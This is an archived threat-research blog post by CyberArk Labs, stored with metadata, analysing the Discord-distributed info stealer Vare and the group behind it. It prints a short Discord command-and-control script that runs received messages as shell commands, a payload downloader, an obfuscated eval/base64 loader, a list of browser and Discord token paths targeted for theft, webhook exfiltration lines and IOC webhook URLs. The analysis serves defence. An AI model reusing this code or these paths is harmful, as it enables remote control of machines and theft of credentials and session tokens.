{ "id": "b915c0a1-1303-4bb0-af2d-2776e7aef2b3", "created_at": "2026-04-06T00:12:13.442164Z", "updated_at": "2026-04-10T03:36:48.472136Z", "deleted_at": null, "sha1_hash": "c92200ed111dde28af32346204ef5bd37811dc56", "title": "The (Not so) Secret War on Discord", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2210391, "plain_text": "The (Not so) Secret War on Discord\r\nBy CyberArk Labs\r\nPublished: 2023-04-13 · Archived: 2026-04-05 15:13:58 UTC\r\nCyberArk Malware Research Team\r\nAbstract\r\nCyberArk Labs discovered a new malware called Vare that is distributed over the popular chatting service,\r\nDiscord. Vare has been used to target new malware operators by using social engineering tactics on them.\r\nAdditionally, we have found that Vare uses Discord’s infrastructure as a backbone for its operations. This malware\r\nis linked to a new group called “Kurdistan 4455” based out of southern Turkey and is still early in its forming\r\nstage.\r\nOrigins of Discord Malware\r\nDiscord is a very popular online chatting service (similar to Slack, but less formal) that has more than 300 million\r\nactive users. Discord was initially meant to be a platform for gaming communities: however, its ease of use and\r\nfeatures expanded its appeal to a variety of communities, ranging from hobby clubs to users with shared political\r\nviews who now call it home.\r\nDiscord is loved by developers due to its easy-to-use and well-documented APIs. It boasts several features that are\r\nused by developers to integrate their tools with and develop bots for their servers with ease. Attackers have found\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 1 of 15\n\nways to misuse those features, which makes the development of malware easier and harder to detect and mitigate.\r\nThe origins of malware on the platform can be traced back to the introduction of Discord Nitro. For a monthly fee,\r\nNitro allows users to send larger files and longer messages, have higher quality video streaming and much more.\r\nAs with many premium features, Discord Nitro became highly desirable amongst users and motivated some users\r\nto try and acquire it without paying. This led users to resort to nefarious methods to obtain Nitro, such as brute-forcing gift keys and social engineering.\r\nEventually, some users took this approach one step further and began operating malware to gain money by\r\ntargeting others on the platform, stealing their credit card information and remotely purchasing Discord Nitro gift\r\nkeys without the victim’s knowledge. These gift keys can be redeemed to get Discord Nitro, and malicious actors\r\nare selling the keys for profit.\r\nMalware targeting Discord users or misusing of Discord’s features for malicious intent is not a new finding as\r\nthere are several past publications on the matter, see for example here and here. This blog post aims to give an\r\noverview of current threat landscape, the latest trends, methods and how they work, and share our observations of\r\na newly found malware group ‘Kurdistan 4455’ that has adopted those past methods for their own benefit,\r\ntargeting other malware groups instead of users, reaping their success with minimal effort.\r\nIn an effort to keep Discord users and communities safe, we have contacted Discord and notified their support\r\nteam on the different ways attackers misuse Discord’s features, and of the new malware group. However, despite\r\nour numerous attempts we did not get a definitive response from Discord. We hope that this blog- post raises\r\nawareness to the issue, so that users can apply measures to protect themselves against common attack methods\r\nthat are employed on Discord.\r\nContent Delivery Network\r\nA Content Delivery Network, better known by the acronym CDN, is, simply put, a hosting service for files that\r\nprovides high availability and uptime. Malware operators utilize this feature for hosting payloads that their tools\r\ncan then download and run. Being hosted on a popular service and protected by HTTPS makes the process of\r\ndifferentiating between the malicious and benign files a difficult task.\r\nhttps://cdn.discordapp.com/attachments//\r\nEasy-to-Use API\r\nDiscord’s API allows straightforward communication between users on the platform and the program using the\r\nAPI, allowing sending and receiving messages and files. As a result, implementing Command \u0026 Control (C\u0026C)\r\ncommunication over the API is as simple a task as writing the following 16 lines of code — which is a simple\r\nscript that executes every message you send and returns the output.\r\nimport discord\r\nimport subprocess\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 2 of 15\n\nclass MyClient(discord.Client):\r\n async def on_message(self, message):\r\n # don't respond to ourselves\r\n if message.author != self.user:\r\n return\r\n result = subprocess.run([message.content], stdout=subprocess.PIPE, shell=True).stdout.decode\r\n await message.channel.send('result')\r\nintents = discord.Intents.default()\r\nintents.message_content = True\r\nMyClient(intents=intents).run('token')\r\nIt is difficult to monitor and mitigate this type of C\u0026C communication because it is communicating with a single\r\nendpoint that can be used by legitimate services, and it is protected by HTTPS, which makes the process of\r\ndifferentiating the malicious and benign API calls a non-trivial task.\r\nhttps://discord.com/api\r\nWebhooks\r\nIntroduced in 2020, webhooks are a relatively new Discord feature that is used ill-intently. This new feature\r\nallows any server owner to create a webhook for any channel they own and send messages to that channel through\r\nthe webhook with a simple HTTPS request.\r\nThis feature is a great way to safely and quickly notify users of specific actions — originally meant to execute\r\nactions such as notification of a new git pull request. Attackers have started misusing this feature to exfiltrate data\r\nfrom their victims.\r\nSimilar to the Discord API, protecting against webhook misuse is a difficult task due to fact that all of the requests\r\ngo to the same domain — and to the content being protected by HTTPS — making monitoring and blocking a\r\nnon-trivial challenge.\r\nIt is important to emphasize that, unlike Discord’s API, webhooks do not allow actions other than sending a\r\nmessage and files to a channel and are not used to create a C\u0026C communication channel.\r\nhttps://discord.com/api/webhooks/\u003cID\u003e/\u003cSPECIAL_TOKEN\u003e\r\nInjecting Code into Discord\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 3 of 15\n\nA method that has recently risen in popularity is injecting a payload into Discord’s source code. This is possible\r\ndue to the fact that Discord is an ElectornJS app written in NodeJS. ElectronJS is a framework that allows the\r\ncreation of desktop apps that are in essence a NodeJS-based website running locally in a Chromium browser. All\r\nof the source code for the app is hosted locally in plaintext and is not checked for tampering prior to execution.\r\nThere are two main reasons for this method’s growing popularity. The first one is persistence. As the payload is\r\npart of Discord’s app source code, it gets executed at the app’s start, which is usually at logon.\r\nThe second reason centers on integrating into Discord’s client, impersonating the victim and forging requests as\r\nthe victim. This allows the malware operator to take actions like exfiltrating all private conversations, forging\r\nmessages as the victim and purchasing Discord Nitro gift keys — a popular way to steal money without an easy\r\ntrace to follow, as the attackers usually sell the stolen keys at a discounted rate and don’t have a direct paper trail\r\nleading to them.\r\nAs much as this method might sound appealing, there are several downsides to the injection approach — for\r\nexample, it is susceptible to removal when Discord has an update, and it requires an initial “injector” to write the\r\npayload into the app’s source code.\r\nGitHub and Some Statistics\r\nThere is a growing trend of developing malware for targeting Discord (usually called “Discord Stealer”) on\r\nGitHub directly, and it allows operators to easily take a repository, clone it, compile it and within minutes have a\r\nfunctioning malware sample that they can use to infect victims.\r\nFigure 1: Search results for “Discord Stealer,” a common nickname for malware for Discord\r\nWe’ve scanned and analyzed 2,390 of GitHub’s public repositories related to Discord malware, and gathered some\r\ninteresting findings:\r\n44.5% of repositories are written in Python and are standalone malware.\r\n20.5% of repositories (second in popularity) are written in JavaScript; these repositories mainly take the\r\napproach of injecting into Discord.\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 4 of 15\n\nWe have also analyzed the activity of those repositories, tracking the amounts of commits per month, and we have\r\nfound that they are growing in popularity substantially in recent years.\r\nFigure 2: Activity heatmap per month in years 2016 – 2022 from 2,390 repositories related to Discord\r\nmalware\r\nVare\r\nIn September 2022, CyberArk Labs detected an intriguing sample called “vare_stealer_builder.exe.” Upon further\r\nresearch, we discovered a link to a new cybercrime group in its early stages of armament and formation, and we\r\nhave followed its efforts closely.\r\nVare is a malware written in Python and converted into an executable with pyInstaller. It is an info stealer that uses\r\nDiscord both as a data exfiltration infrastructure and a target to steal from.\r\nWhen running the sample, we were greeted with the following message:\r\nFigure 3: Fake configuration panel\r\nWhile the malware calls itself a builder, we can see it only looks like one!\r\nSo, what is actually happening here? This is a classic example of “smoke and mirrors,” a deception made to trick\r\nvictims into thinking that they are configuring and creating a new sample while they, themselves, are being\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 5 of 15\n\ncompromised.\r\nTechnical Analysis Overview\r\nVare is comprised of two publicly available tools — Veerus and Empyrean — and an additional custom module.\r\nThis malware follows the following logic flow:\r\nFigure 4: Vare logic flow\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 6 of 15\n\nBreaking it down further, we have identified three unique areas in the malware and have identified the origin of\r\neach one. Next, we will dive deeper into the malware and go over the different elements.\r\nVeerus: Obfuscation Layers\r\nStarting with what we dub as the obfuscation layers, we have discovered that the malware author used the same\r\nbuild system as in the https://github.com/0xSxZ/Veerus repository, as we found a shared custom obfuscation\r\nlibrary made by the Veerus author.\r\nThe first layer is a simple base64 obfuscation.\r\nThe second layer of the obfuscation is the custom-made obfuscation library, originally created for Veerus, but now\r\nit is also used in Vare.\r\nimport pyImpossibleObf\r\nexec(pyImpossibleObf.deobfuscate([72, 68, 70, 35, 49, ... ])\r\nEmpyrean: Main Functionality\r\nFollowing the obfuscation layers, there are several modules that were taken from an older snapshot of Empyrean,\r\na very popular Discord stealer on GitHub. In this version it has five modules:\r\n1. Debug:\r\nCompares system information against a list of blacklisted values. System information includes the IP and\r\nMAC addresses, Username, PC name, currently running processes and lastly the HWID (by running\r\nC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid)\r\nThe malware will exit (but will not delete itself) if any pieces of system information are found inside the\r\nblacklists\r\n2. Startup:\r\nResponsible for persistency\r\nDrops a copy of the malware in %APPDATA%\\empyrean\\dat.txt\r\nCreates a script to run the dropped malware in %APPDATA%\\empyrean\\run.bat\r\nAdds a registry entry in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\empyrean pointing to\r\nthe run.bat file\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 7 of 15\n\nFigure 5: Persistence on Startup\r\n3. Chromium:\r\nTargets Google Chrome, Microsoft Edge and Brave\r\nCollects passwords, cookies, browsing and search history, bookmarks.\r\nSends all collected information through a Discord webhook\r\nFigure 6 : Example of how the operators will see the collected browser information\r\n4. Discord:\r\nCollects session tokens, billing information, Nitro status, the account-bound phone number and additional\r\naccount information\r\nSends all collected information through a Discord webhook\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 8 of 15\n\nFigure 7 : Example of how the operators will see the collected Discord information\r\n5. Sysinfo:\r\nCollects the Username, System information, Disk Usage, Wi-Fi, and Network Information\r\nTakes a screenshot\r\nIt sends all collected information through a Discord webhook\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 9 of 15\n\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 10 of 15\n\nFigure 8 : Example of how the operators will see the collected system information\r\nVare – Custom Code\r\nIn addition to the code identified from public repositories, we have identified code written by the author that, as\r\nmentioned before, allows the malware to masquerade as a builder: a tool for configuring and creating new\r\ninstances of malware clients.\r\nTo further add to the illusion of building a new instance, Vare downloads and saves a file with the name\r\n“built.exe” to trick users into thinking that this is their newly built client — while in reality, this is simply another\r\nvariation of Vare, but without any prints.\r\ndef download(O00OO0OOO000OO00O):\r\n OOO00O0000O0OO0OO= requests.get(O00OO0OOO000OO00O)\r\n OOOOOOOO00OO00O00= O00OO0OOO000OO00O.split(\"/\")[-1]\r\n with open(OOOOOOOO00OO00O00 ,\"wb\") as OO0O0O0O00000O0OO:\r\n OO0O0O0O00000O0OO.write(OOO00O0000O0OO0OO.content)\r\ndownload(\"https://cdn.discordapp[.]com/attachments/1013115456963489868/1021582059543740476/build.exe\r\nUsing all of the deceptions we have described, there is one additional payload that is executed, hidden in another\r\nlayer of obfuscation as seen here:\r\nmagic = 'aW1wb3J0IG9zICNsaW5lOj...PME8wME9P'\r\nlove = 'ZR8jZQNtBvAfnJ5yBwpmQD...tVPNtVPNt'\r\ngod = 'ICAgICBjb250aW51ZSAjbG...gLCJhIilh'\r\ndestiny = 'plOCG09CGmOCZQNjG09CG...covNbXD=='\r\njoy = '\\x72\\x6f\\x74\\x31\\x33'\r\ntrust = eval('\\x6d\\x61\\x67\\x69\\x63') + eval('\\x63\\x6f\\x64\\x65\\x63\\x73\\x2e\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\r\nexec(compile(base64.b64decode(eval('\\x74\\x72\\x75\\x73\\x74')),'','exec'))\r\nThe obfuscation is comprised of several layers. First, there is the eval layer that is visible inside the “trust”\r\nvariable. Eval is used to execute python code that is stored in a variable, which in our situation translates into:\r\nmagic + codecs.decode(love, joy) + god + codecs.decode(destiny, joy)\r\nThis layer is responsible for generating a base64, based on several variables and the layer uses the python built-in\r\nlibrary codecs to decode two variables — love and destiny — that are obfuscated with rot13. The generated\r\nbase64 contains the payload, and it is decoded and executed one final time.\r\nThe hidden payload collects passwords, cookies and session tokens from various browsers and Discord. Similar to\r\nhow the rest of Vare operates, this information is exfiltrated via a Discord webhook.\r\nlocal = os.getenv('LOCALAPPDATA')\r\nroaming = os.getenv('APPDATA')\r\ntokenPaths = {'Discord': f\"{roaming}\\\\Discord\",\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 11 of 15\n\n'Discord Canary': f\"{roaming}\\\\discordcanary\",\r\n 'Discord PTB': f\"{roaming}\\\\discordptb\",\r\n 'Google Chrome': f\"{local}\\\\Google\\\\Chrome\\\\User Data\\\\Default\",\r\n 'Opera': f\"{roaming}\\\\Opera Software\\\\Opera Stable\",\r\n 'Brave': f\"{local}\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default\",\r\n 'Yandex': f\"{local}\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\",\r\n 'OperaGX': f\"{roaming}\\\\Opera Software\\\\Opera GX Stable\"}\r\nKurdistan 4455\r\nIn this part, we will provide a deep dive analysis of the new group we have discovered, how we discovered them\r\nand their motivations for running the group.\r\nMalware Author\r\nDuring our research into Vare, we found a single piece of evidence that connects the developer to the tool. The\r\nevidence is a single line of code found inside Vare that is meant for exfiltrating collected data, please note that due\r\nto the sensitivity of the matter we replaced the real usernames with pseudonyms:\r\nwebhook.send(embed=embed, username='Vare | Github MalwareAuthor, avatar_url='https://cdn.discordapp.c\r\nThis led us to a GitHub user with the same username, who we believe is the malware author.\r\nFigure 9: MalwareAuthor’s GitHubprofile\r\nWe did not find a repository called “Vare” under his account, we assume he made it private, but we did find\r\nadditional evidence that makes us believe that he is, in fact, the malware author.\r\nWe found that they forked Veerus, the project they borrowed the obfuscation from.\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 12 of 15\n\nFigure 10: Forked Veerus repository by MalwareAuthor\r\nDiving deeper into the user, we see his repositories and starred projects are all Discord malware-related, and all of\r\nhis activity is connected to those efforts, further confirming our theory.\r\nA Co-developer\r\nTriaging outwards from MalwareAuthor, we found that he only has one follower — and both account description\r\nstate that the users’ company name is “4455.” Both accounts also have a Discord invite link to the same server and\r\nstate that they are from Turkey. Later, we found out that the follower is a friend of our developer and they are both\r\nin the same group.\r\nFigure 11: CoDeveloper profile snippet, the co-developer\r\nFrom what it seems, while MalwareAuthor is working on the client-side aspect of malware, while CoDeveloper is\r\nfocusing on support tools, creating tools for brute-force finding of Discord Nitro gift keys (Premium Discord\r\nfeatures), scripts to check if stolen tokens are valid and usable, and more.\r\nDiscord Server\r\nBoth MalwareAuthor’s and CoDeveloperGitHub pages include an invite link to their server — using the link, we\r\nwere able to join the group’s Discord server (originally named “Kurdistan 4455”). We found around 150 members,\r\nabout 50 of whom were tagged as being an active part of 4455.\r\nThe server (and presumably the group) was created around May 2022.\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 13 of 15\n\nFigure 12: Server ID and creation date\r\nFrom our reconnaissance phase, we can assume that the group’s motivation is twofold:\r\nThe first motivation is monetary, as they tried selling Discord Nitro to users at a discounted rate — a\r\ncommon way to launder money from stolen credit card data on the platform.\r\nThe second motivation is hacktivism. Based on their ideology and their origin, we assume this stems from\r\nthe long-standing conflict between Turkey and the Kurdistan people.\r\nConclusion\r\nOne of many examples, Vare is a perfect case of how publicly available repositories are being used to help arm\r\ncybercrime groups and how attackers can leverage Discord’s infrastructure maliciously. And sadly, as seen in our\r\nresearch of the activity on GitHub on these topics, the phenomenon is only growing in popularity.\r\nWith Discord being such a popular platform among corporate developers, these developers could potentially put\r\ntheir organizations at risk if the malware is able to infect their endpoints.\r\nAs Discord continues to grow, we can only expect an advancement in malware complexity and capabilities and\r\nadditional approaches, when it comes to using Discord’s infrastructure. Additionally, similar approaches may be\r\nused to utilize other online chatting services.\r\nWe believe that the group will evolve to using a Discord Injection module as seen in newer versions of\r\nhttps://github.com/addi00000/empyrean. Either by upgrading Vare or using a new tool, this Injection module adds\r\nan additional persistence and enables spoofing user actions.\r\nOne evolution that we have already observed is the transition into compiled languages such as Rust and C++ for\r\nthe standalone versions of Discord malware — these make analyses take longer and allow the attackers to move\r\nfaster and use more widely available obfuscation and packing tools with relative ease.\r\nIOC\r\nDiscord\r\nWebhook\r\nEmpyrean\r\nmodule\r\nhttps://discord[.]com/api/webhooks/1021574403802280046/rKIMx2Nq8SgIn48QD74Grm2XErZ-30gLtwXCHouvWxmWu1vTtF7yGkduiXYAwRUuuHk3\r\nDiscord\r\nWebhook\r\nhttps://discord[.]com/api/webhooks/1021574457652953178/kVIULeWZgij4sfsg23PPb-lIUKzz9NJ7TWo7AuFMk0hQ5XlswI5_xsQJsHyzHT9isiK7\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 14 of 15\n\ncustom\r\nmodule\r\nRegistry\r\npersistence\r\npath\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\empyrean\r\nPath to\r\npayload on\r\ndisk\r\n%APPDATA%\\empyrean\\dat.txt\r\nPath to\r\npayload\r\nrunner on\r\ndisk\r\n%APPDATA%\\empyrean\\run.bat\r\nDiscord\r\nWebhook\r\nEmpyrean\r\nmodule\r\nhttps://discord[.]com/api/webhooks/1021574403802280046/rKIMx2Nq8SgIn48QD74Grm2XErZ-30gLtwXCHouvWxmWu1vTtF7yGkduiXYAwRUuuHk3\r\nVare GUI\r\nsha256\r\n9c54484a5af113a679a2006257da3245ee2d080bd4dd2a4d35478979e7888117\r\nVare no\r\nGUI\r\nsha256\r\nc598a6da98c0b862a6bac8fbed7c25c51c4885a20a8221756fa25cf3ad2c7484\r\nSource: https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "references": [ "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord" ], "report_names": [ "the-not-so-secret-war-on-discord" ], "threat_actors": [ { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "9041c438-4bc0-4863-b89c-a32bba33903c", "created_at": "2023-01-06T13:46:38.232751Z", "updated_at": "2026-04-10T02:00:02.888195Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove" ], "source_name": "MISPGALAXY:Nitro", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b44a04-a080-4465-973d-976ce53777de", "created_at": "2022-10-25T16:07:23.911791Z", "updated_at": "2026-04-10T02:00:04.786538Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove", "Nitro" ], "source_name": "ETDA:Nitro", "tools": [ "AngryRebel", "Backdoor.Apocalipto", "Chymine", "Darkmoon", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Moudour", "Mydoor", "PCClient", "PCRat", "Poison Ivy", "SPIVY", "Spindest", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434333, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c92200ed111dde28af32346204ef5bd37811dc56.pdf", "text": "https://archive.orkl.eu/c92200ed111dde28af32346204ef5bd37811dc56.txt", "img": "https://archive.orkl.eu/c92200ed111dde28af32346204ef5bd37811dc56.jpg" } }